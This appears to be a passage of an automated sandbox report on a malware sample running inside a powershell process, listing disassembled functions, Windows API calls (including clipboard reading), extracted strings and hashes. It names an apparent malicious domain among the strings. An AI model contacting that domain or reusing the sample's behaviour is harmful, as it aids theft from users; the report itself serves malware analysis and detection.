Function 0052B5B2 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

9., xrefs: 0052B630
9., xrefs: 0052B980

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: 9.$9.
API String ID: 2994545307-2940951921
Opcode ID: c3cdf1bb0814f6a68f1ac4146fdbfcf17824d856eb0dd4e2edf30a9bc060accc
Instruction ID: f3fbf891ed50f3dd6c296ff3571390d18233ad3ce929bb75309a9b074d1b907c
Opcode Fuzzy Hash: c3cdf1bb0814f6a68f1ac4146fdbfcf17824d856eb0dd4e2edf30a9bc060accc
Instruction Fuzzy Hash: 8B418971E056299BE728CB28FC817253FA2FF96300F68861CE441EB3E5D7705C458780

Function 00508BD5 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da53c1bc580bc9baa9c962ef02e8f831e4cb51caab72a5ea471b13b5a451a25b
Instruction ID: 3fa0f06c2053e17e1d021ab96033e13451547e17852454a8da88b20b3619b433
Opcode Fuzzy Hash: da53c1bc580bc9baa9c962ef02e8f831e4cb51caab72a5ea471b13b5a451a25b
Instruction Fuzzy Hash: 1481F1B25082418FD724CF28C852A7FBBE1BFA6304F18492DE4D98B392EB35D945C752

Function 0052B460 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0052E5CB,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0052B48E

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00529A70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,004F8796,8B8A7A00), ref: 00529A80

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 258b0de212610a8d32b17e5fbe0e95d5c0080e2fc9b19a3281e102117582087a
Instruction ID: 8fd42ed8599e04b533e031ae8c3313ed6eacfe8d180408f833539488cec60121
Opcode Fuzzy Hash: 258b0de212610a8d32b17e5fbe0e95d5c0080e2fc9b19a3281e102117582087a
Instruction Fuzzy Hash: 45C01230884120AFC6045F00DC08F6ABFB8AF5B242F002028A009732B2C620B808DA88

Function 0052E780 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

@, xrefs: 0052E844

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: d1c9ec17f3d743a4b00d8d9c8d2fd0a41a0ae2b5a0687f146391ba3652799685
Instruction ID: 98f8d2699502cecef28f7700a749ea7b2e9d63d2eb4ccfe9b7309eaede9546e3
Opcode Fuzzy Hash: d1c9ec17f3d743a4b00d8d9c8d2fd0a41a0ae2b5a0687f146391ba3652799685
Instruction Fuzzy Hash: 6D4113B29043218BD714CF28E84662BBBE2FFD6328F19855CE8D55B3D1E734990587D2

Function 004F9AD0 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

>?, xrefs: 004F9B45

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: >?
API String ID: 0-3061458111
Opcode ID: e7acb1882e39fdbf24c8dd0c1f4ee1a6c7fcb25e922549a10f0af669d0ea3af6
Instruction ID: 809c8b53e451d4e52fc25accaeaf8c746a9660a878cab6e8acef2e6efa1f5e6e
Opcode Fuzzy Hash: e7acb1882e39fdbf24c8dd0c1f4ee1a6c7fcb25e922549a10f0af669d0ea3af6
Instruction Fuzzy Hash: 8D113A386083408FC314CF1598946BBBBE2EBD6308F14562CE1D957381C775950ACB9A

Function 00515560 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bc0ff2a888850b7684aaa9d49ce1a478d472731bb509c5f55e7468ee733758b
Instruction ID: df4b7c7ea6e06828b0d300f13fe6548aab7872ef27658aa7b27d4f7c8976e141
Opcode Fuzzy Hash: 5bc0ff2a888850b7684aaa9d49ce1a478d472731bb509c5f55e7468ee733758b
Instruction Fuzzy Hash: 6AB14B72A14714DBFB14CE2498826EB7B92FFD1314F59882DE8858B381F634DD46C392

Function 004FD92E Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 004FD935

Strings

'$6,, xrefs: 004FDA02
dobu, xrefs: 004FDA1E
9 54, xrefs: 004FDA09
q, xrefs: 004FDBDB
]8, xrefs: 004FDC05
M^8, xrefs: 004FDC46
crackerdolk.click, xrefs: 004FDCD2
9>?}, xrefs: 004FDA10

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: Uninitialize
String ID: '$6,$9 54$9>?}$M^8$crackerdolk.click$dobu$q$]8
API String ID: 3861434553-3077452486
Opcode ID: 16efa9ad63bd135cce02c456b9baa7bd4846dca01f83d5684f81c81b3320678c
Instruction ID: c71f6549aa088d4db9252a55c1056b6f49606e42d6bb26e2e2dfb9013e2ce577
Opcode Fuzzy Hash: 16efa9ad63bd135cce02c456b9baa7bd4846dca01f83d5684f81c81b3320678c
Instruction Fuzzy Hash: B7B136B5A087828FD719CF39C490622BFE2FF96300B18969DC9D64B75AC739E805CB54

Function 00520AD3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00520B7E

Strings

0, xrefs: 00520D26

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: bfdc85702b37b556c0f6c65f504c12711a8aa1a3fc491bb98b5c22c56bb06963
Instruction ID: 4c98a3b3d65d00f8c70cb5dd31cc118ca6fd3e825084ab53dbcd0c459326d42b
Opcode Fuzzy Hash: bfdc85702b37b556c0f6c65f504c12711a8aa1a3fc491bb98b5c22c56bb06963
Instruction Fuzzy Hash: 38912C21108FC18ED336CA3C8858757BFD15B67224F084B9CD1F78BBE6C6A5A50AC326

Function 0051EF01 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 161
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0051EF86

Strings

0, xrefs: 0051F228

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: d3ca8530c2dc15eac2676921be8b9d141e707f2925a078a578c2a56c9366e0cf
Instruction ID: ee825b077f864c35661142fc15a1630a25c74bfdd0e976a4a80ff6024d8d36fb
Opcode Fuzzy Hash: d3ca8530c2dc15eac2676921be8b9d141e707f2925a078a578c2a56c9366e0cf
Instruction Fuzzy Hash: 97A1B130108FC2CAD3328A3C88587D7BFD25B66324F484B9DD5FA4A3E2D3652146C766

Function 0051E37F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32 ref: 0051E38B

Strings

0, xrefs: 0051E576

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: FreeString
String ID: 0
API String ID: 3341692771-4108050209
Opcode ID: 4b1161859cf55d63a5a1a9d43e0b10a73c34fc858cf48bfc9e3a243254369843
Instruction ID: d61bf50c1bd868d61c4dbadf79507751756bfa963663284d8a824de84af2f567
Opcode Fuzzy Hash: 4b1161859cf55d63a5a1a9d43e0b10a73c34fc858cf48bfc9e3a243254369843
Instruction Fuzzy Hash: DE81E921118FC2CED336C63C8948247BFD16B67228F484B9CD1E64BBE6D3A5B506C766

Function 004FE54A Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 004FE54E
CoInitializeEx.COMBASE(00000000,00000002), ref: 004FE693

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f6924f77a53af76cf60f833cded16e40555da31aad29a6f6647ad2ad81c3f157
Instruction ID: 7c23f3ae252ce82beff648c9599baa1918529e7fe4155dcb3084a37f9323301a
Opcode Fuzzy Hash: f6924f77a53af76cf60f833cded16e40555da31aad29a6f6647ad2ad81c3f157
Instruction Fuzzy Hash: 6041B6B4810B40AFD370EF39990B7137EB8AB05250F504B1DF9EA866D4E631A4198BD7

Function 0052C079 Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0052C079
GetForegroundWindow.USER32 ref: 0052C07F

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 7ab5d35f40e09c2d1ff307d139dd38560b2e79409fad8afdd6820f1b3f74559f
Instruction ID: bf73c615f043aa8fa955a241de9892360e8b0689dd2c876f551405bfe06580d5
Opcode Fuzzy Hash: 7ab5d35f40e09c2d1ff307d139dd38560b2e79409fad8afdd6820f1b3f74559f
Instruction Fuzzy Hash: C4C04C351502009BC244AB64FD79414BBE0F7292457045858E953C23F0CB20640CAE50

Function 005243F5 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0052441A

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: dc5704a510b1ad666563ac920797ff839311b30826f94aae76c288415e0549ea
Instruction ID: d16e2ac6a7a4c198f4f4cd2d7c389633b16ff42fcf8565ac3006ec3ebbc8d973
Opcode Fuzzy Hash: dc5704a510b1ad666563ac920797ff839311b30826f94aae76c288415e0549ea
Instruction Fuzzy Hash: B821F632A08A518FC719CE788D8025E7BA36BE9214F2DC2ECC595573DAD9316906CB50

Function 0051D68D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0051D6D6

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 3dee232f5026bef49767c8c23f9f817765783fb90bf031f5e3247127f95abc50
Instruction ID: 05e44430ed7b21ef3a64c05b56aa3a083420c8eebf54a0189465c1ef72fec297
Opcode Fuzzy Hash: 3dee232f5026bef49767c8c23f9f817765783fb90bf031f5e3247127f95abc50
Instruction Fuzzy Hash: E501F9B46057018FD304DF28C5A871ABBF1FBC5304F10985CE5958B3A0CB79A948CF82

Function 005208D7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00520922

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: a9cc4ec2a0e9070867273ad0116c7da883323fc752efb1c866931f4f841d43d8
Instruction ID: 4b7d49f3f670f845a71bac219934d78f7d48da3a3c9e452588990db23df98d34
Opcode Fuzzy Hash: a9cc4ec2a0e9070867273ad0116c7da883323fc752efb1c866931f4f841d43d8
Instruction Fuzzy Hash: 2FF0A471509B028FE310DF34D55830BBBF1BB84318F158A1CE4A54B394C7B9A5498F82

Function 004FE6CF Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004FE6E1

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 9623f48ce315f05a39536a9efe4ea3550ab0bcfd5536f71b4ab998722ec5ff73
Instruction ID: 7185558a66a3efb1d7c2ff6d20982fa0b9128c2fcb9bd5955575bd69ed030205
Opcode Fuzzy Hash: 9623f48ce315f05a39536a9efe4ea3550ab0bcfd5536f71b4ab998722ec5ff73
Instruction Fuzzy Hash: BFD0C9303C47547AF1784B58EC67F5432505715F11F742608B362FE3D0C9E0BA059609

Function 00529AA0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0050289F), ref: 00529AC0

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4bb7234a0cea3639edbaef1e27adc2fe2d7832942cab6b74f621856f7df180c0
Instruction ID: 0879a0e2e975c6099aa1cf37075ec0dade10b52d787369d1c730e959cec21f77
Opcode Fuzzy Hash: 4bb7234a0cea3639edbaef1e27adc2fe2d7832942cab6b74f621856f7df180c0
Instruction Fuzzy Hash: B3D0C931845132EBCA102F28BC09BCB7F94AF59360F0748A1F545AA1B6D624AC959AD0

Non-executed Functions

Function 005075BE Relevance: 13.4, APIs: 3, Strings: 4, Instructions: 1197COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,64746910,6474690E,00000000,00000000,?,00000000), ref: 00507EF1

Strings

[7`1, xrefs: 00507C90
, xrefs: 00507FFF
UNOL, xrefs: 00508269
{P, xrefs: 00507BD6

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $UNOL$[7`1${P
API String ID: 237503144-1182418270
Opcode ID: 8b9389d64b956c5e861dc109d4b7950877fe255923acbae69cfec6f6ee8e47ee
Instruction ID: 34fc545890d0736d5be48102d44633ebc16610f95089ace6e2a67f10dc546d07
Opcode Fuzzy Hash: 8b9389d64b956c5e861dc109d4b7950877fe255923acbae69cfec6f6ee8e47ee
Instruction Fuzzy Hash: E472F476A083518BD728CF28C8917BFBBE1FF99314F18896CE4C687291E7389945C752

Function 00501056 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 468COMMON

Download Yara Rule

Strings

\, xrefs: 00501264
C, xrefs: 005015B2
k, xrefs: 005013B1
y, xrefs: 005010C3
r, xrefs: 00501411

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: C$\$k$r$y
API String ID: 0-1251240214
Opcode ID: b454e80b01e7cb8f017668e0b6828088b177346fd50aa4c5a0b5204ab3041a73
Instruction ID: 209d9c75cbb1576ca2a22da1da166f29e2cf2a99623f6e51d3387828d8b73cce
Opcode Fuzzy Hash: b454e80b01e7cb8f017668e0b6828088b177346fd50aa4c5a0b5204ab3041a73
Instruction Fuzzy Hash: 67128B7560CB808BC724DB38C5953AEBFE1BB89314F148E2EE5D9873D2D63885458B17

Function 00512B80 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 252COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00512CB5

Strings

Y^, xrefs: 00512BF2
SH, xrefs: 00512BEA
AU, xrefs: 00512BFA

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: AU$SH$Y^
API String ID: 237503144-2404045158
Opcode ID: a42a32c526fa1d70f49cb588c906952e04e6b15d3ec8926bc163f5856abfa850
Instruction ID: a0593ffea3fe503f621a68f00b1e4d57e2788a13774a41eb8bd6cb4b956e1aa3
Opcode Fuzzy Hash: a42a32c526fa1d70f49cb588c906952e04e6b15d3ec8926bc163f5856abfa850
Instruction Fuzzy Hash: E68167B66083548FD314CF64DC4175FBBE5EBD5304F09892DE9945B381DBB4980ACB92

Function 00521740 Relevance: 9.1, APIs: 6, Instructions: 139clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00521764
GetClipboardData.USER32 ref: 0052177F
GlobalLock.KERNEL32 ref: 0052179C
GlobalUnlock.KERNEL32 ref: 005218E8
CloseClipboard.USER32 ref: 005218F0

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
